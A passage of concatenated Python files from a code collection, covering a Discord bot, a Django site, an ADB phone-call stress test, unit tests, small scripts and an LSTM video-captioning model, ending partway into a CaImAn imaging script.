{}!'.format(discord.__version__))\n logging.info('Username: {0.name}, ID: {0.id}'.format(bot.user))\n logging.info(\"Connected to {} servers.\".format(len(bot.guilds)))\n logging.info('------')\n\n logging.warning(\"Stalk Market is fully loaded.\")\n\n\n# ---- Command Error Handling ----- #\n@bot.event\nasync def on_command_error(ctx, error):\n\n # https://gist.github.com/EvieePy/7822af90858ef65012ea500bcecf1612\n # This prevents any commands with local handlers being handled here in on_command_error.\n if hasattr(ctx.command, 'on_error'):\n return\n\n if type(error) == discord.ext.commands.NoPrivateMessage:\n await ctx.send(\"⚠ This command can not be used in DMs!!!\")\n return\n elif type(error) == discord.ext.commands.CommandNotFound:\n await ctx.send(\"⚠ Invalid Command!!!\")\n return\n elif type(error) == discord.ext.commands.MissingPermissions:\n await 
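The odd-only sieve in `p7.py` above stores flags for odd numbers only (index `i` stands for the value `2*i + 1`), starting the running total at 2 to account for the lone even prime. A quick cross-check of `sumOfPrimes` against a direct trial-division sum for small N (helper names hypothetical):

```python
def sum_primes_naive(n):
    def is_prime(k):
        return k > 1 and all(k % d for d in range(2, int(k ** 0.5) + 1))
    return sum(k for k in range(2, n + 1) if is_prime(k))

print(sum_primes_naive(10))   # 17 = 2 + 3 + 5 + 7, matching the docstring
print(sum_primes_naive(100))  # 1060
```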
ctx.send(\"⚠ You need the **Manage Messages** permission to use this command\".format(error.missing_perms))\n return\n elif type(error) == discord.ext.commands.MissingRequiredArgument:\n await ctx.send(\"⚠ {}\".format(error))\n elif type(error) == discord.ext.commands.BadArgument:\n await ctx.send(\"⚠ {}\".format(error))\n elif isinstance(error, commands.CommandOnCooldown):\n await ctx.send(\"⚠ {}\".format(error))\n else:\n # await ctx.send(\"⚠ {}\".format(error))\n raise error\n\n\n@bot.event\nasync def on_error(event_name, *args):\n logging.exception(\"Exception from event {}\".format(event_name))\n\n if 'error_log_channel' not in bot.config:\n return\n\n error_log_channel = bot.get_channel(bot.config['error_log_channel'])\n\n embed = None\n # Determine if we can get more info, otherwise post without embed\n if args and type(args[0]) == discord.Message:\n message: discord.Message = args[0]\n # embeds.exception_w_message(message)\n elif args and type(args[0]) == discord.RawMessageUpdateEvent:\n logging.error(\"After Content:{}.\".format(args[0].data['content']))\n if args[0].cached_message is not None:\n logging.error(\"Before Content:{}.\".format(args[0].cached_message.content))\n # Todo: Add more\n\n traceback_message = \"```python\\n{}```\".format(traceback.format_exc())\n traceback_message = (traceback_message[:1993] + ' ...```') if len(traceback_message) > 2000 else traceback_message\n await error_log_channel.send(content=traceback_message, embed=embed)\n\n\nif __name__ == '__main__':\n\n with open('config.json') as json_data_file:\n config = json.load(json_data_file)\n\n db_pool: asyncpg.pool.Pool = asyncio.get_event_loop().run_until_complete(db.create_db_pool(config['db_uri']))\n asyncio.get_event_loop().run_until_complete(db.create_tables(db_pool))\n\n bot.config = config\n bot.db_pool = db_pool\n bot.command_prefix = config['bot_prefix']\n\n bot.load_cogs()\n bot.run(config['token'])\n\n logging.info(\"cleaning Up and shutting down\")\n","sub_path":"src/startStalkMarket.py","file_name":"startStalkMarket.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"233792900","text":"from django.conf import settings\nfrom django.conf.urls import include, url\nfrom django.conf.urls.static import static\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.views import defaults as default_views\nfrom django.views.generic import TemplateView\n\nfrom gkdsite.views import *\nfrom django_messages.views import *\n# from gkdsite.views import MyListView\n# from django_markdown.views import *\n\n\"\"\"\n... 
EXAMPLES ...\n Function views:\n ---------------\n 1) Add an import -> from myApp import views\n 2) Add URL to urlpatterns-> url(r'^$', views.home, name='home')\n\n Class-based views:\n ------------------\n 1) Add an import -> from otherApp.views import Home\n 2) Add URL to urlpatterns-> url(r'^$', Home.as_view(), name='home')\n\n Including another URLConf:\n --------------------------\n 1) Add an import -> from blog import urls as blog_urls\n 2) Import the include() func-> from django.conf.urls import include, url\n 3) Add URL to urlpatterns-> url(r'^blog/$', include(blog_urls)) \n\"\"\"\nurlpatterns = [\n url(r\"^$\", TemplateView.as_view(template_name=\"homepage.html\"), name=\"home\"),\n url(r\"^admin/\", include(admin.site.urls)),\n url(r\"^account/\", include(\"account.urls\")),\n\n # https://github.com/codingforentrepreneurs/Guides/blob/master/all/common_url_regex.md\n url(r'^events/', include(\"events.urls\", namespace='events')),\n # url(r'^profile/(?P[\\w.@+-]+)/$', user_profile, name='profile'),\n\n # User management\n url(r'^mylang/', mylang, name='user_language'),\n\n # Messages\n url(r\"^messages/\", include(\"django_messages.urls\", namespace=\"messages\")),\n url(r'^inbox/$', inbox, name='messages_inbox'),\n url(r'^outbox/$', outbox, name='messages_outbox'),\n url(r'^compose/$', compose, name='messages_compose'),\n url(r'^compose/(?P[\\w.@+-]+)/$', compose, name='messages_compose_to'),\n url(r'^reply/(?P[\\d]+)/$', reply, name='messages_reply'),\n url(r'^view/(?P[\\d]+)/$', view, name='messages_detail'),\n url(r'^delete/(?P[\\d]+)/$', delete, name='messages_delete'),\n url(r'^undelete/(?P[\\d]+)/$', undelete, name='messages_undelete'),\n url(r'^trash/$', trash, name='messages_trash'),\n url(r\"^notifications/\", include(\"pinax.notifications.urls\")),\n\n # Other stuff\n url(r\"^blog/\", include(\"pinax.blog.urls\", namespace=\"pinax_blog\")),\n url(r'^markdown/', include(\"django_markdown.urls\")),\n]\n\nif settings.DEBUG:\n # * Don't serve static content in production! 
*\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n # This allows the error pages to be debugged during development, just visit\n # these url in browser to see how these error pages look like.\n urlpatterns += [\n url(r'^400/$', default_views.bad_request, kwargs={'exception': Exception('Bad Request!')}),\n url(r'^403/$', default_views.permission_denied, kwargs={'exception': Exception('Permission Denied')}),\n url(r'^404/$', default_views.page_not_found, kwargs={'exception': Exception('Page not Found')}),\n url(r'^500/$', default_views.server_error),\n ]\n if 'rosetta' in settings.INSTALLED_APPS:\n urlpatterns += [\n url(r'^rosetta/', include('rosetta.urls')),\n ]\n","sub_path":"gkdsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"74705630","text":"import os\nimport time\nfrom sys import argv\nIterations=argv[1]\npasscnt = 0\nfailcnt = 0\ndef sim_test():\n os.system(\"adb shell getprop >gsm.txt \")\n with open(\"gsm.txt\",\"r+\") as fh:\n lines=fh.readlines()\n for line in lines:\n string1=\"[gsm.sim.state]: [READY,READY]\"\n string2 = \"[gsm.sim.state]: [READY,NOT_READY]\"\n string3 = \"[gsm.sim.state]: [NOT_READY,READY]\"\n string4 = \"[gsm.sim.state]: [ABSENT,READY]\"\n string5 = \"[gsm.sim.state]: [READY,ABSENT]\"\n if (string1 in line or string2 in line or string3 in line or string4 in line or string5 in line):\n print(\"Sim present, so proceeding with the test\")\n return(True)\n # only report absence after scanning every line of the getprop output\n return(False)\ndef Validate():\n os.system( \"adb shell dumpsys telephony.registry > mCallState.txt\")\n time.sleep(5)\n with open(\"mCallState.txt\",\"r+\") as fh:\n lines=fh.readlines()\n for line in lines:\n string1=\"mCallState=2\"\n if(string1 in line):\n print(\"Call already connected and in progress...\\n\")\n return(True)\n return(False) \ndef KillGmMusic():\n os.system(\"adb shell am force-stop com.generalmobile.app.musicplayer\") \ndef LaunchGmMusic():\n os.system(\"adb shell monkey -p com.generalmobile.app.musicplayer -c android.intent.category.LAUNCHER 1\")\n time.sleep(2) \n \nfor i in range(int(Iterations)):\n if(sim_test()):\n if(Validate()):\n print(\"Ending the call \\n\")\n os.system(\"adb shell input keyevent KEYCODE_ENDCALL\")\n else:\n print(\"No call is in progress...\")\n print(\"Connecting the call to MT_num...\\n\")\n os.system(\"adb shell am start -a android.intent.action.CALL -d tel:9100071290\")\n time.sleep(3)\n KillGmMusic()\n LaunchGmMusic()\n os.system(\"adb shell input tap 536 1290\")\n if(Validate()):\n print(\"Call successfully connected and in progress...\")\n passcnt+=1\n time.sleep(2)\n print(\"Ending the call \\n\")\n os.system(\"adb shell input keyevent KEYCODE_ENDCALL\")\n print(\"Call successfully disconnected ...\")\n else:\n failcnt+=1\n time.sleep(5)\n KillGmMusic() \n else:\n print(\"SIM not present...unable to make a call...\")\n failcnt+=1 \nprint(\"Pass count,Fail count: \",passcnt,failcnt)\n \n \n\n\n \n","sub_path":"ADB Scripts/GMLAB Scripts/stress_stability/MOcall_audio.py","file_name":"MOcall_audio.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"137094441","text":"import random\n\nfrom django.test import TestCase\nfrom django.utils import timezone\n\nfrom promotions.models import Stage, Lesson\nfrom skills.models 
import Skill, StudentSkill\nfrom stats.StatsObject import LeastMasteredSkill, MostMasteredSkill\nfrom users.models import User, Student\n\n\nclass TestLeastSkillAcquired(TestCase):\n def setUp(self):\n number_of_student = 100\n number_of_skills = 100\n\n students_list = []\n students_list2 = []\n skills_list = []\n\n stage = Stage.objects.create(name=\"stage\", short_name=\"s\", level=1)\n stage_no_student_acquired_skills = Stage.objects.create(name=\"stage_nas\", short_name=\"snas\", level=1)\n stage_no_student_acquired_skills.save()\n stage.save()\n\n lesson = Lesson.objects.create(name=\"lesson\", stage=stage)\n lesson_no_acquired_skill = Lesson.objects.create(name=\"lesson2\", stage=stage_no_student_acquired_skills)\n lesson2 = Lesson.objects.create(name=\"lesson2\", stage=stage)\n lesson.save()\n lesson_no_acquired_skill.save()\n lesson2.save()\n\n for i in range(0, number_of_student):\n user = User.objects.create(username=\"username\" + str(i))\n user2 = User.objects.create(username=\"usernameV2\" + str(i))\n student = Student.objects.create(user=user)\n student2 = Student.objects.create(user=user2)\n student.save()\n student2.save()\n lesson.students.add(student)\n lesson2.students.add(student2)\n students_list.append(student)\n students_list2.append(student2)\n\n for i in range(0, number_of_skills):\n gen_name = \"skill\" + str(i)\n gen_name2 = gen_name + \"v2\"\n skill = Skill.objects.create(code=gen_name, name=gen_name)\n skill2 = Skill.objects.create(code=gen_name2, name=gen_name2)\n skill.save()\n skill2.save()\n stage.skills.add(skill)\n stage_no_student_acquired_skills.skills.add(skill2)\n skills_list.append(skill)\n\n random.seed()\n\n max_skill, skill_obj_max = None, None\n min_skill, skill_obj_min = None, None\n\n max_skill2, skill_obj_max2 = None, None\n min_skill2, skill_obj_min2 = None, None\n\n for skill in skills_list:\n count, count2 = 0, 0\n for student in students_list:\n if random.randint(0, 1) == 1:\n skill_student = StudentSkill.objects.create(student=student, skill=skill, acquired=timezone.now())\n skill_student.save()\n count += 1\n for student in students_list2:\n if random.randint(0, 1) == 1:\n skill_student = StudentSkill.objects.create(student=student, skill=skill, acquired=timezone.now())\n skill_student.save()\n count2 += 1\n\n if max_skill is None or count > max_skill:\n max_skill = count\n skill_obj_max = skill\n if min_skill is None or count < min_skill:\n min_skill = count\n skill_obj_min = skill\n\n if max_skill2 is None or count2 > max_skill2:\n max_skill2 = count2\n skill_obj_max2 = skill\n if min_skill2 is None or count2 < min_skill2:\n min_skill2 = count2\n skill_obj_min2 = skill\n\n self.expected_min_skill = skill_obj_min\n self.expected_max_skill = skill_obj_max\n\n self.expected_min_skill_lesson2 = skill_obj_min2\n self.expected_max_skill_lesson2 = skill_obj_max2\n\n self.lesson = lesson\n self.lesson2 = lesson2\n self.lesson_no_acquired_skill = lesson_no_acquired_skill\n\n def test_least_skill_acquired(self):\n least_lesson1 = LeastMasteredSkill(self.lesson).data\n least_lesson2 = LeastMasteredSkill(self.lesson2).data\n self.assertEquals(least_lesson1, self.expected_min_skill)\n self.assertEquals(least_lesson2, self.expected_min_skill_lesson2)\n\n def test_most_skill_acquired(self):\n most_lesson1 = MostMasteredSkill(self.lesson).data\n most_lesson2 = MostMasteredSkill(self.lesson2).data\n self.assertEquals(most_lesson1, self.expected_max_skill)\n self.assertEquals(most_lesson2, self.expected_max_skill_lesson2)\n\n def 
test_when_no_skill_is_acquired_in_stage(self):\n most_none = MostMasteredSkill(self.lesson_no_acquired_skill).data\n least_none = LeastMasteredSkill(self.lesson_no_acquired_skill).data\n self.assertEquals(most_none, None)\n self.assertEquals(least_none, None)\n","sub_path":"stats/tests/testLeastMostAcquiredSkill.py","file_name":"testLeastMostAcquiredSkill.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"115177768","text":"import random\r\nimport plotly.express as px\r\nimport plotly.figure_factory as ff\r\ncount = []\r\nsum = []\r\nfor i in range(0,100):\r\n dice1 = random.randint(1,6)\r\n dice2 = random.randint(1,6)\r\n sum.append(dice1+dice2)\r\n count.append(i)\r\nfig = ff.create_distplot([sum],[\"result\"])\r\nfig.show()\r\n","sub_path":"109.py","file_name":"109.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"514495697","text":"import argparse\nimport sys\n\npunction_marks = [',', '.', '?', '!', '-', ':', '\\'']\n\n\ndef is_punction_mark(character):\n for mark in punction_marks:\n if character == mark:\n return True\n return False\n\n\ndef stream_read(stream):\n # Split the text into paragraphs while reading\n s = []\n paragraph = \"\"\n for line in stream:\n line = line.strip()\n if line == '':\n if paragraph == '':\n continue\n s.append(paragraph)\n paragraph = \"\"\n else:\n paragraph += ' ' + line\n s.append(paragraph)\n return s\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\")\n parser.add_argument(\"-o\", \"--output\")\n parser.add_argument(\"-l\", \"--line-length\", type=int, default=0)\n parser.add_argument(\"-p\", \"--paragraph-spaces\", type=int, default=0)\n args = parser.parse_args()\n if args.paragraph_spaces < 0 or args.line_length < 0:\n raise ValueError(\"Invalid arguments\")\n return args\n\n\ndef main():\n # Parse command-line arguments\n args = parse_arguments()\n\n # Read the text\n if args.input:\n try:\n paragraphs = stream_read(open(args.input))\n except IOError:\n print(\"IOError\")\n sys.exit(1)\n else:\n paragraphs = stream_read(sys.stdin)\n\n answer = []\n for par in paragraphs:\n # Put spaces around punctuation marks\n for mark in punction_marks:\n par = par.replace(mark, ' ' + mark + ' ')\n\n # Split the text into whitespace-free chunks\n words = par.split()\n\n word_with_punction_marks = \"\"\n previous_word = \"\"\n new_list_of_words = []\n num_spaces = args.paragraph_spaces\n for word in words:\n # Prepend the paragraph indent spaces to the first word of each paragraph\n if previous_word == \"\":\n for i in range(0, num_spaces):\n previous_word += \" \"\n previous_word += word\n word_with_punction_marks = previous_word\n continue\n # Attach punctuation marks to the word on their left\n if (not (is_punction_mark(word)) and\n is_punction_mark(previous_word)):\n new_list_of_words.append(word_with_punction_marks)\n word_with_punction_marks = word\n elif (is_punction_mark(word) and is_punction_mark(previous_word)):\n word_with_punction_marks += word\n elif (is_punction_mark(word) and not\n (is_punction_mark(previous_word))):\n word_with_punction_marks += word\n else:\n new_list_of_words.append(previous_word)\n word_with_punction_marks = word\n previous_word = word\n new_list_of_words.append(word_with_punction_marks)\n\n words = new_list_of_words\n max_line_length = args.line_length\n result = \"\"\n # Join words into the lines of a paragraph\n for 
word in words:\n if len(word) > max_line_length:\n raise ValueError(\"Too long word\")\n if len(result) + len(word) + 1 <= max_line_length:\n if result == \"\":\n result = word\n else:\n result += \" \" + word\n else:\n answer.append(result)\n result = word\n answer.append(result)\n\n # Join the paragraphs with line breaks\n answer = '\\n'.join(answer)\n\n if args.output:\n try:\n out = open(args.output, \"w\")\n out.write(answer)\n except IOError:\n print(\"IOError\")\n sys.exit(1)\n else:\n sys.stdout.write(answer)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Форматирование_текста.py","file_name":"Форматирование_текста.py","file_ext":"py","file_size_in_byte":4028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293749243","text":"#!/Users/xg203/opt/anaconda3/bin/python\nimport sys\nimport json\nsys.stdout.flush()\nf=\"./data/test_cwl.json\"\n\ndef main():\n loop_cwl(f)\n\ndef write_run_section(run_sec):\n outf='./data/'+str(run_sec['id']).replace('#', '')+'.json'\n with open(outf, 'w') as OUTF:\n json.dump(run_sec, OUTF,indent=3)\n\ndef loop_cwl(cwl_f):\n with open(cwl_f) as F:\n cwlobj=json.load(F)\n for k, v in cwlobj.items():\n if(k==\"steps\"):\n for i in range(len(v)):\n write_run_section(v[i])\n\nif __name__ == '__main__':\n main()\n","sub_path":"extrac_run_from_cwl.json.py","file_name":"extrac_run_from_cwl.json.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"183234215","text":"\r\n\r\ndef get_day(month):\r\n if month==1:return 31\r\n elif month == 2 : \r\n # leap years are divisible by 4, except century years not divisible by 400\r\n if year%4==0 and (year%100!=0 or year%400==0):\r\n return 29\r\n else: return 28\r\n elif month == 3 : return 31\r\n elif month == 4 : return 30\r\n elif month == 5 : return 31\r\n elif month == 6 : return 30\r\n elif month == 7 : return 31\r\n elif month == 8 : return 31\r\n elif month == 9 : return 30\r\n elif month == 10 : return 31\r\n elif month == 11 : return 30\r\n elif month == 12 : return 31\r\n\r\nt = int(input(\"Number of test cases : \"))\r\n\r\nwhile t>=1:\r\n \r\n date = input(\"Enter in format yyyy:mm:dd : \")\r\n date = date.split(\":\")\r\n year = int(date[0])\r\n month = int(date[1])\r\n day_of_med = int(date[2])\r\n no_of_days=0\r\n med_count=0\r\n \r\n while True:\r\n till_day = get_day(month)\r\n print(till_day)\r\n cur_day=0\r\n for i in range(day_of_med, till_day+1 ,2):\r\n cur_day=i\r\n med_count+=1\r\n \r\n if day_of_med%2==0:\r\n day_of_med=2\r\n if month!=12:\r\n month+=1\r\n else:\r\n month=1\r\n \r\n if(2+(till_day-cur_day)==2):\r\n pass\r\n else:\r\n break;\r\n else:\r\n day_of_med=1\r\n if month!=12:\r\n month+=1\r\n else:\r\n month=1\r\n \r\n if(1+(till_day-cur_day)==2):\r\n pass\r\n else:\r\n break;\r\n \r\n print(med_count)\r\n t-=1 \r\n \r\n \r\n \r\n \r\n ","sub_path":"When_to_take_medicine.py","file_name":"When_to_take_medicine.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435256306","text":"import torch\r\nimport torch.nn.functional as F\r\nimport json\r\nimport videoLoader as vL\r\nimport dictBuilder as dB\r\nimport myData\r\n\r\nuse_gpu = torch.cuda.is_available()\r\n# global embed_\r\nembed_ = torch.nn.Embedding(3000, 256)\r\nembed_.load_state_dict(torch.load('./models/embed_.pth'))\r\n\r\nclass MyLSTM_1(torch.nn.Module):\r\n def __init__(self):\r\n # global embed_\r\n super(MyLSTM_1, self).__init__()\r\n self.conv1 = 
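The hand-written month-length table in `get_day` above, including the leap-year rules, can be checked against the standard library, which already encodes the Gregorian calendar:

```python
import calendar

print(calendar.monthrange(2020, 2)[1])  # 29 -- 2020 is a leap year
print(calendar.monthrange(1900, 2)[1])  # 28 -- divisible by 100 but not by 400
print(calendar.isleap(2000))            # True -- divisible by 400
```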
torch.nn.Conv2d(3, 12, 5, padding=2)\r\n self.pool1 = torch.nn.MaxPool2d(2)\r\n self.conv2 = torch.nn.Conv2d(12, 48, 3, padding=1)\r\n self.pool2 = torch.nn.MaxPool2d(4)\r\n self.line1 = torch.nn.Linear(49152, 4096)\r\n\r\n self.lstm1 = torch.nn.LSTM(4096, 256)\r\n # self.lstm2 = torch.nn.LSTM(49152, 256)\r\n self.lstmc1 = torch.nn.LSTMCell(256, 256)\r\n self.lstmc2 = torch.nn.LSTMCell(256, 256)\r\n self.hidden_cell1 = (torch.zeros(1, 1, 256), torch.zeros((1, 1, 256)))\r\n self.hidden_cell2 = (torch.zeros(1, 1, 256), torch.zeros((1, 1, 256)))\r\n # self.line2 = torch.nn.Linear(1024, 256)\r\n\r\n # self.embed = torch.nn.Embedding(3000, 256)\r\n\r\n def forward(self, video):\r\n # global embed_\r\n if use_gpu:\r\n embed = embed_.cuda()\r\n else:\r\n embed = embed_\r\n #each video contains 10 cap frames, thus batch = 10\r\n out = F.relu(self.conv1(video)) # size() = (10, 3, 256, 256)\r\n out = self.pool1(out)\r\n out = F.relu(self.conv2(out))\r\n out = self.pool2(out)\r\n out = out.view(out.size()[0], -1)\r\n out = F.relu(self.line1(out))\r\n\r\n # t = out.transpose(0, 1)\r\n out = out.unsqueeze(1) # size() = (10, 1, 512)\r\n # print(out.size())\r\n\r\n #\"\"\"\r\n if use_gpu:\r\n h, c0 = self.hidden_cell1[0].cuda(), self.hidden_cell1[1].cuda()\r\n else:\r\n h, c0 = self.hidden_cell1[0], self.hidden_cell1[1]\r\n out, (h, c0) = self.lstm1(out, (h, c0))\r\n # out, (h, c) = self.lstm2(out, h)\r\n\r\n # print(out.size(), h.size())\r\n # 10, 1, 256\r\n temp = torch.LongTensor([3000-1])\r\n\r\n coll = torch.zeros(18, 256)\r\n c1 = torch.zeros(1, 256)\r\n if use_gpu:\r\n temp, coll, c1 = temp.cuda(), coll.cuda(), c1.cuda()\r\n temp = embed(temp)\r\n h = h[0]\r\n for i in range(10):\r\n # print(out[i].size(), temp.size(), c1.size())\r\n temp, c1 = self.lstmc1(out[i], (temp, c1))\r\n h = temp\r\n temp = torch.zeros(1).long()\r\n if use_gpu:\r\n temp = temp.cuda()\r\n temp = embed(temp) #\r\n for i in range(18):\r\n temp, c1 = self.lstmc2(temp, (h, c1))\r\n coll[i] = temp\r\n\r\n \"\"\" \r\n h, c0 = self.hidden_cell1[0], self.hidden_cell1[1]\r\n h, c0, c1 = (h[0], c0[0], c0[0])\r\n h1 = torch.zeros(1, 256)\r\n coll = torch.zeros(18, 256)\r\n padding = torch.LongTensor([3000-1])\r\n if use_gpu:\r\n h, c0, h1, c1, coll, padding = h.cuda(), c0.cuda(), h1.cuda(), c1.cuda(), coll.cuda(), padding.cuda()\r\n padding = embed(padding)\r\n for i in range(5):\r\n # print(out.size(), h.size(), c0.size(), padding.size(), h.size(), c1.size())\r\n h, c0 = self.lstmc2(out[i], (h, c0))\r\n h1, c1 = self.lstmc1(padding, (h, c1))\r\n h1 = torch.LongTensor([0])\r\n if use_gpu:\r\n h1 = h1.cuda()\r\n h1 = embed(h1)\r\n\r\n for i in range(18):\r\n h, c0 = self.lstmc2(out[i%10], (h, c0)) # how to do padding for frame input?\r\n h1, c1 = self.lstmc1(h1, (h, c1))\r\n coll[i] = h1\r\n \"\"\"\r\n # ret = torch.zeros(18)\r\n # for i in range(18):\r\n # dist = torch.norm(self.embed.weight.data - coll[i], dim=1)\r\n # ret[i] = torch.argmin(dist)\r\n # return ret\r\n\r\n return coll # (18, 256)\r\n\r\n\r\ndef train(num_epoch, videofile, labelfile, savepath='./models/all_states.pth'):\r\n # global embed_\r\n if use_gpu:\r\n embed = embed_.cuda()\r\n else:\r\n embed = embed_\r\n # frozen_list = ['embed']\r\n dataset = myData.myData(videofile, labelfile)\r\n dataloader = torch.utils.data.DataLoader(dataset, batch_size=1, shuffle=True)\r\n\r\n # dictfile = json.load(open(dictfile), 'r')\r\n model = MyLSTM_1()\r\n try:\r\n saved = torch.load(savepath)\r\n model.load_state_dict(saved[\"net\"])\r\n\r\n except:\r\n saved = False\r\n 
print(\"No existing model found\")\r\n print(\"Starting a new model\")\r\n\r\n # for name, value in model.named_parameters():\r\n # if name in frozen_list:\r\n # value.requires_grad = False\r\n # params = filter(lambda p: p.requires_grad, model.parameters())\r\n loss_fn = torch.nn.MSELoss()\r\n # optimizer = torch.optim.Adam(params, lr=0.001)\r\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\r\n\r\n if use_gpu:\r\n model = model.cuda()\r\n loss_fn = loss_fn.cuda()\r\n\r\n for t in range(num_epoch):\r\n print(\"Current epoch:\", t)\r\n count = 0\r\n for i, data in enumerate(dataloader, 0):\r\n count += 1\r\n inputs, labels = data\r\n # if count%10 == 0:\r\n # print(inputs.size(), labels)\r\n if use_gpu:\r\n inputs, labels = inputs.cuda(), labels.cuda()\r\n\r\n optimizer.zero_grad()\r\n outputs = model(inputs[0])\r\n labels = labels.long()\r\n\r\n labels = embed(labels[0].long())\r\n # labels = labels[0]\r\n #print(outputs.size(), labels.size())\r\n loss = loss_fn(outputs, labels)\r\n if count % 50 == 0:\r\n print(\"count = %s, loss = %s\"%(count,loss))\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if t % 5 == 0:\r\n all_states = {\"net\": model.state_dict(), \"opt\": optimizer, \"epoch\": t}\r\n torch.save(obj=all_states, f=savepath)\r\n\r\n all_states = {\"net\": model.state_dict(), \"opt\": optimizer, \"epoch\": t}\r\n torch.save(obj=all_states, f=savepath)\r\n return all_states\r\n\r\n\r\ndef testing(testsetpath, dictpath, modelpath, outputpath):\r\n global use_gpu\r\n use_gpu = False\r\n embed = embed_\r\n # \"./MLDS_hw2_1_data/testing_data/\", \"temp.json\", \"./models/0.pth\", \"./MLDS_hw2_1_data/pred.txt\"\r\n videos = dict()\r\n fp = open(testsetpath + \"id.txt\", 'r')\r\n videopath = testsetpath + \"video/\"\r\n for line in fp:\r\n if line.endswith('\\n'):\r\n templine = line[:len(line) - 1]\r\n else:\r\n templine = line\r\n videos[templine] = vL.video_2_matrix(videopath, templine)\r\n fp.close()\r\n\r\n model = MyLSTM_1()\r\n try:\r\n saved = torch.load(modelpath)\r\n model.load_state_dict(saved[\"net\"])\r\n for name, paras in model.named_parameters():\r\n print(name, paras)\r\n except:\r\n print(\"model not found!\")\r\n return False\r\n\r\n preds = dict()\r\n words = json.load(open(dictpath, 'r'))\r\n words_re = dict()\r\n words_re[3000 - 1] = ''\r\n words_re[3000 - 2] = ''\r\n words_re[0] = ''\r\n words_re[1] = ''\r\n for word in words.keys():\r\n words_re[words[word]] = word\r\n\r\n out = dict()\r\n for video in videos.keys():\r\n preds[video] = model(torch.Tensor(videos[video]))\r\n one_hots = torch.zeros(18)\r\n sent = list()\r\n for i in range(18):\r\n dist = torch.norm(embed.weight.data - preds[video][i], dim=1)\r\n one_hots[i] = torch.argmin(dist)\r\n if int(one_hots[i]) in words_re.keys():\r\n sent.append(words_re[int(one_hots[i])])\r\n else:\r\n sent.append(\"\")\r\n out[video] = \"\"\r\n for word in sent:\r\n if (word == \"\") or word == \"\":\r\n continue\r\n if word == \"\":\r\n break\r\n out[video] = out[video] + ' ' + word\r\n\r\n fp = open(outputpath, 'w')\r\n for video in out.keys():\r\n print(video, out[video], file=fp)\r\n fp.close()\r\n use_gpu = torch.cuda.is_available()\r\n return out\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # c = 1450\r\n comm = \"train\"\r\n if comm == \"train\":\r\n cl = (100, 200, 300, 400, 500, 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1450)\r\n for i in range(10):\r\n for c in cl:\r\n print(\"Current c =\", c)\r\n videofile = \"%straining.json\"%c\r\n labelfile = \"./MLDS_hw2_1_data/training_vec.json\"\r\n 
states = train(2, videofile, labelfile, savepath='./models/all_states_4.pth')\r\n torch.save(obj=states, f='./models/4_%s.pth'%i)\r\n if comm == \"test\":\r\n testing(\"./MLDS_hw2_1_data/testing_data/\", \"temp.json\", \"./models/4_0.pth\", \"./MLDS_hw2_1_data/pred_4.txt\")","sub_path":"HW2/LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52279823","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n/** \n * The DEMO script implements streaming image analysis part of the closed-loop system between MicroManager \n * and CaImAn toolbox (python). Two processes are communicating through named pipes, which are used for \n * sending signals that trigger specific processing steps in both environments. Images that are acquired \n * during the recording are saved in a multiTIFF file which is in turn read by CaImAn and used for online \n * analysis.\n * \n * author: Tea Tompos (master's internship project, June 2020)\n */\n\n\"\"\"\n\n# %% ********* Importing packages: *********\nimport sys\nimport caiman as cm\nimport logging\nfrom pytictoc import TicToc\nfrom caiman.source_extraction.cnmf import params as params\nfrom caiman.source_extraction import cnmf as cnmf\nimport os\nfrom caiman.paths import caiman_datadir\n\n# %% ********* Creating named pipes for communication with MicroManager: *********\ntimer = TicToc()\ntimer.tic() # start measuring time\n\n# sendPipeName = \"/tmp/getPipeMMCaImAn.ser\"\t # FOR SENDING MESSAGES --> TO MicroManager\n# receivePipeName = \"/tmp/sendPipeMMCaImAn.ser\" # FOR READING MESSAGES --> FROM MicroManager\n\n# MMfileDirectory = '/Applications/MicroManager 2.0 gamma/uMresults'\nCaimanFileDirectory = caiman_datadir() # specify where the file is saved \n\n\n# if os.path.exists(sendPipeName):\n# os.remove(sendPipeName)\n# os.mkfifo(sendPipeName)\n# print (\"Removed old write-pipe, created new write-pipe.\")\n# else: \n# os.mkfifo(sendPipeName)\n# print (\"Write-pipe created sucessfully!\")\n \n# if os.path.exists(receivePipeName):\n# os.remove(receivePipeName)\n# os.mkfifo(receivePipeName)\n# print (\"Removed old read-pipe, created new read-pipe.\")\n# else: \n# os.mkfifo(receivePipeName)\n# print (\"Read-pipe created sucessfully!\")\n \n# timer.toc()\n# # %% ********* Wait for file name: *********\n# print(\"Waiting for file name..\")\n# pipeRead = open(receivePipeName, 'r') # open the read pipe\n# getFileName = pipeRead.readline()[:-1] # wait for message\n\n# fullFileName = getFileName 